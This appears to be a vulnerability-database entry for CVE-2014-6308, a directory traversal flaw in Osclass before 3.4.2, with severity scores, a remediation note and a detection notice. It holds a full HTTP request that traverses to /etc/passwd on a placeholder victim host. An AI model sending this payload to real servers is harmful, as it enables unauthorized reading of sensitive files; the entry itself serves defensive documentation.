🔙 목록으로 돌아가기

CVE-2014-6308: Osclass Security Advisory 3.4.1 - Local File Inclusion

TitleOsclass Security Advisory 3.4.1 - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactAn attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
RemediationUpgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability.
CVSS Score5
EPSS Score0.69729
CVE IDCVE-2014-6308
CWE IDCWE-22
Tags cve2014 cve lfi packetstorm osclass vuln

🔍 Vulnerability Description

A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.

🌐 HTTP Request

GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/6.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-6308.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-6308.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A